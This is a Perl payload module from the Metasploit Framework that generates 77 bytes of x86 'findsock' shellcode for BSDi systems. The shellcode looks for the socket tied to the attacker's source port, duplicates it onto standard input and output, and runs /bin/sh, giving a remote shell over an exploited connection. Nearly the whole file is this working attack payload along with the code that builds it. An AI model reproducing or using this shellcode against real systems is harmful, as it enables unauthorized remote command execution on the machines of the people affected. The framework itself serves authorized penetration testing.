##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##
package Msf::Payload::bsdi_ia32_findsock;
use strict;
use base 'Msf::PayloadComponent::FindConnection';
my $info =
{
'Name' => 'BSDi IA32 SrcPort Findsock Shell',
'Version' => '$Revision: 1615 $',
'Description' => 'Spawn a shell on the established connection',
'Authors' => [ 'skape <mmiller [at] hick.org>',
'optyx <optyx [at] uberhax0r.net>' ],
'Arch' => [ 'x86' ],
'Priv' => 0,
'OS' => [ 'bsdi' ],
'Size' => '',
'UserOpts' =>
{
'CPORT' => [1, 'PORT', 'Local port used by exploit'],
}
};
sub new
{
my $class = shift;
my $hash = @_ ? shift : { };
$hash = $class->MergeHashRec($hash, {'Info' => $info});
my $self = $class->SUPER::new($hash, @_);
$self->_Info->{'Size'} = $self->_GenSize;
return $self;
}
sub Build
{
my $self = shift;
return $self->Generate($self->GetVar('CPORT'));
}
sub Generate
{
my $self = shift;
my $port = shift;
my $port_bin = pack('n', $port);
my $off_port = 41;
my $shellcode = # 77 byte findsock
"\x68\x00\x07\x00\xc3\xb8\x9a\x00\x00\x00\x99\x50\x89\xe7\x31\xf6" .
"\x83\xec\x10\x89\xe1\x6a\x10\x89\xe3\x46\x6a\x1f\x58\x53\x51\x56" .
"\xff\xd7\x83\xc4\x0c\x66\x81\x79\x02\x11\x5c\x75\xec\x6a\x02\x59" .
"\xb0\x5a\x51\x56\xff\xd7\x49\x79\xf7\x50\x68\x2f\x2f\x73\x68\x68" .
"\x2f\x62\x69\x6e\x89\xe3\x50\x54\x53\xb0\x3b\xff\xd7";
substr($shellcode, $off_port, 2, $port_bin);
return $shellcode;
}
sub _GenSize
{
my $self = shift;
return length($self->Generate(4444));
}
1;